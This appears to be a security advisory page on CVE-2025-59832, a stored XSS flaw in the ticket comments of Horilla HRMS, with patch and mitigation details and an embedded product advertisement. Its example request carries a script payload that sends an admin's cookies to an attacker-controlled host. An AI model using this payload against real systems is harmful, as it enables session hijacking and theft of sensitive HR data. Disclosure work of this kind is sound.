Overview
The CVE-2025-59832 is a potent vulnerability found in Horilla, a widely-used open source Human Resource Management System (HRMS). The flaw is a stored Cross-Site Scripting (XSS) vulnerability that could allow an attacker with low-privilege access to execute arbitrary JavaScript in an administrator’s browser. This has the potential to hijack the admin’s session, exfiltrate cookies or CSRF token, leading to a full system compromise or data leakage.
Given the popularity of Horilla as an HRMS solution, the vulnerability affects a broad range of organizations, potentially exposing their sensitive HR data to cyber threats. The severity of this vulnerability underscores the importance of prompt patching and use of mitigation strategies to maintain system security.
Vulnerability Summary
CVE ID: CVE-2025-59832
Severity: Critical (9.9 on the CVSS scale)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required
Impact: System compromise, data leakage
Affected Products
Share secrets securely
Ameeba is private infrastructure for communication and sensitive work built on encrypted identity instead of exposed corporate identity systems.
Passwords, credentials, confidential files, screenshots, internal discussions, sensitive AI context, and private coordination should not become exposed across ordinary communication platforms.
- • Encrypted identity
- • Private Spaces for organizations and teams
- • End-to-end encrypted chat, calls, files, and notes
- • Sensitive AI work and protected collaboration
- • Built for information that cannot leak
Our mission is to secure human work alongside AI.
Product | Affected Versions
Horilla HRMS | Prior to version 1.4.0
How the Exploit Works
The exploit takes advantage of a stored XSS vulnerability in the ticket comment editor of Horilla HRMS. An attacker, even with low-privilege access, could inject malicious JavaScript into the comment section. This stored script is then executed when an admin opens the ticket, leading to the execution of the script in the admin’s browser. This could lead to the exfiltration of the admin’s cookies or CSRF token and potentially enable the hijacking of their session.
Conceptual Example Code
The following is a conceptual example of how the vulnerability might be exploited. It involves a POST request with a malicious payload.
POST /ticket/comment HTTP/1.1
Host: target.example.com
Content-Type: application/json
{
"comment": "<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>"
}
In the example, the attacker injects a script that redirects the document location to their own server, appending the admin’s cookies to the URL which can be subsequently captured.
This vulnerability has been patched in version 1.4.0 of Horilla HRMS. As a mitigation strategy, users are advised to promptly apply the patch or use Web Application Firewall (WAF) or Intrusion Detection System (IDS) as temporary mitigation.
